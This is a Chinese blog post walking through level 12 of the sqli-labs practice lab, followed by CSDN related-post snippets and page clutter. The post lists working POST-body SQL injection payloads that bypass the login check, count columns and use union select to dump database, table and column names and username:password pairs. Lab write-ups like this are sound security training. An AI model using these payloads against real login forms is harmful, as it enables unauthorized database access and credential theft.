sqli-labs less-12 post注入

于 2024-10-07 14:20:20 发布
阅读量396 收藏 2
点赞数 14
分类专栏: sqli-labs靶场 文章标签: less 数据库 前端 web安全 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wanggonghanfei/article/details/142739610
版权

sqli-labs less-12

在这里插入图片描述
首先尝试在url进行测试,发现页面无任何变化。在提交窗口随意输入,打开hackbar插件,查看数据 (注意,hackbar插件使用时,&Submit=Submit中S必须大写)
在这里插入图片描述
猜测为post注入。在post提交参数中uname后加入单引号,页面显示登录失败,无报错,添加双引号,报错
post注入参数

uname=aaa"&passwd=aaa&Submit=Submit

在这里插入图片描述

从报错分析闭合方式为"),构造

uname=aaa") or 1=1 #&passwd=aaa&Submit=Submit

显示
在这里插入图片描述
存在注入

查看列数

uname=aaa") order by 4 #&passwd=aaa&Submit=Submit 报错
uname=aaa") order by 3 #&passwd=aaa&Submit=Submit 报错
uname=aaa") order by 2 #&passwd=aaa&Submit=Submit 无回显,确定列数2

union联合注入查询确定回显位,数据库名,版本等

uname=aaa") union select 1,2 #&passwd=aaa&Submit=Submit
uname=aaa") union select database(),version() #&passwd=aaa&Submit=Submit

在这里插入图片描述

爆出所有数据库名,表名,列名,数据

  • uname=aaa") union select group_concat(schema_name),version() from information_schema.schemata #&passwd=aaa&Submit=Submit
    所有数据库
  • uname=aaa") union select group_concat(table_name),version() from information_schema.tables where table_schema=database() #&passwd=aaa&Submit=Submit
    security的所有表明
  • uname=aaa") union select group_concat(column_name),version() from information_schema.columns where table_schema=database() and table_name=‘users’ #&passwd=aaa&Submit=Submit
    所有列明

*uname=aaa") union select group_concat(username,‘:’,password),version() from security.users #&passwd=aaa&Submit=Submit
数据
在这里插入图片描述
至此,结束,
题外话:想问一下大家,为什么这次不能使用–+注入,只能–或者#。且–与&之间需要空格,不能直连,是因为url编码嘛,求大佬指点。谢谢

子非鱼999
关注
专栏目录
Sqli-labs靶场第12关详解[Sqli-labs-less-12]
m0_73615178的博客
03-02 743
所以,payload分析输入一个username值然后使用单引号加小括号 ") 闭合前面的语句,然后为了使where语句条件成立,加上一个or 1=1 ,-- 注释语句使后面的语句直接注释password不用判断。由于这题是post请求,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。根据题目看,像一个登录页面,尝试使用布尔型盲注测试能否登录网站。输入:-admin") union select 1,2--爆出当前数据库名称及当前用户名。
sqli-labs less-11 & less-12
water0diamond的博客
03-17 922
POST-Error Based-Single quotes-String (基于错误的POST单引号字符型注入) Less-11 POST-Error Based-Double quotes-String-with twist (基于错误的双引号POST型字符型变形的注入)Less-12 前面10关都是get型的,而从现在开始我们进入post型关卡 post是一种数据提...
详细sqli-labs(1-65)通关讲解
热门推荐
dreamthe的博客
05-17 15万+
​ 如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65关重点关卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。​SQL注入非常详细总结_糊涂是福yyyy的博客-CSDN博客_sql注入数据包 ​...
sqli-labs less11 POST注入-字符型
qq_51550750的博客
03-23 979
sqli-labs less11 POST注入 注入工具:burp (1)判断类型: burp抓包,看到传参admin,是可以正常显示的: and 1 = 1 异常,估计不是数字型 尝试单引号: 报错了,好征兆 and 1=1 --+ and 1 = 2 --+ 由此,断定这个字符型 的闭合就是’ (2)判断字段个数: order by 1回显正常 order by 2回显正常 order by 3回显错误 判断字段个数是2个 (3)判断回显位置: 显然,两个回显位置都可以 (4)爆数
Sqli-labs Less32-Less33 宽字节注入
beiweixiaotian66的博客
07-25 656
一丢丢Sqli-labs小练习
sqli-labs Less11 POST注入
m0_63711447的博客
04-14 559
POST注入,不能直接在地址栏构造payload,通过bp或者hackbar构造payload 1、先抓包查看传参方式和传参数据 2、闭合测试 在admin后加一个单引号重新发包,出现报错,可知是单引号闭合方式 用万能密码'or 1=1#试试 3、使用order by语句判断有几列 order by3报错,order by2回显正常,所有有两个回显位 4、查库,得到当前数据库为security uname=1admin' union select 1,databa..
sqli注入详解——>sqli-labs less-1~65
qq_51780583的博客
03-18 996
UNION 操作符用于合并两个或多个 SELECT 语句的结果集。请注意,UNION 内部的 SELECT语句必须拥有相同数量的列。列也必须拥有相似的数据类型。同时,每条 SELECT 语句中的列的顺序必须相同。服务器端有两个部分:第一部分为tomcat为引擎的jsp型服务器,第二部分为apache为引擎的php服务器,真正提供web服务器的是php服务器。工作流程为:client访问服务器能直接访问到tomcat服务器,然后tomcat服务器再向apache服务器请求数据。
Sqli-labs靶场第11关详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1442
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
Sqli-labs靶场第16关详解[Sqli-labs-less-16]自动化注入-SQLmap工具注入
m0_73615178的博客
03-03 737
-batch当你需要以批处理模式运行 sqlmap,避免任何用户干预 sqlmap 的运行,可以强制使用--batch这个开关。这样,当 sqlmap 需要用户输入信息时,都将会以默认参数运行。由于这题是,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件爆出当前主机名称。
Sqli-labs靶场第18关详解[Sqli-labs-less-18]自动化注入-SQLmap工具注入
m0_73615178的博客
03-03 1257
所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。尝试加上注入语句(报错注入),测试是否会执行并返回报错语句爆出想要的信息。使用单引号' 测试得到了报错即: ' 为闭合方式。在user-agent处加上*代表注入点。
Sqli-labs靶场第21、22关详解[Sqli-labs-less-21、22]自动化注入-SQLmap工具注入|sqlmap跑base64加密
m0_73615178的博客
03-03 1097
由于21/22雷同,都是需要登录后,注入点通过Cookie值进行测试,值base64加密修改注入数据选项:--tamper=base64encode。
Proxyless的多活流量和微服务治理
无休居士的博客
10-03 1177
Joylive Agent 是一个基于字节码增强的框架,专注于多活和单元化场景下的流量治理。它提供了以下功能:多活流量调度、全链路灰度发布、QPS和并发限制、标签路由、负载均衡,熔断降级,鉴权等流量治理策略。其特性包括微内核架构、强类隔离、业务零侵入等,使其在保持高性能的同时对业务代码影响最小,是面向Java领域的新一代Proxyless Service Mesh探索实现。项目地址:https://github.com/jd-opensource/joylive-agent。
实用SQL小总结
UntifA的博客
09-29 1439
SQL记录
Ubuntu有关redis的命令
最新发布
weixin_53717695的博客
10-06 144
Ubuntu有关redis的命令
MySQL之复合查询与内外连接
zdlynj的博客
09-30 1256
前面我们讲解的mysql表的查询都是对一张表进行查询,即数据的查询都是在某一时刻对一个表进行操作的。而在实际开发中,我们往往还需要对多个表同时进行查询。我们这里使用的测试表,为雇员信息表(来自Oracle 9i的经典测试表):EMP员工表,DEPT部门表,SALGRADE工资等级表。
World of Warcraft [CLASSIC][80][Grandel] Call to Arms: Victory in Wintergrasp
qq 117791303
10-02 308
Wintergrasp 冬拥湖 120 VS 120
Redis事务
zhzjn的博客
09-30 386
Redis事务可以通过MULTI、EXEC、WATCH和DISCARD指令来实现。1. MULTI指令:表示事务的开始,之后的所有指令都会被逐一记录,但不会立即执行。2. EXEC指令:表示事务的执行,会按照记录的指令逐一执行。3. WATCH指令:可以监视一个或多个键的变化,如果在事务执行期间被其他客户端修改,事务会被回滚。4. DISCARD指令:表示事务的撤销,可以放弃之前记录的指令。
【RocketMQ】RocketMQ应用难点
记录一名在读研究生的学习笔记、感悟、开发产物
09-30 891
本文探讨了RocketMQ中消息重复消费的问题及其解决方案,尤其是在CLUSTERING模式下的扩容影响。文章分析了重复消费的原因,如广播模式、负载均衡模式下的多consumerGroup消费、消费者组内的动态变化及网络延迟等,并提出了利用唯一标识进行去重的方法。此外,还讨论了如何选择合适的存储机制以高效处理大量消息标识,如HashMap、MySQL、Redis以及推荐的布隆过滤器等方案。对于防止消息堆积与确保消息不丢失,也给出了相应的策略和技术措施。
sqli-labs less
07-28
抱歉,我无法回答关于sqli-labs less的问题。 #### 引用[.reference_title] - *1* *2* *3* [sqli-labs教程——Less 1-10](https://blog.csdn.net/qq_25649867/article/details/111020393)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值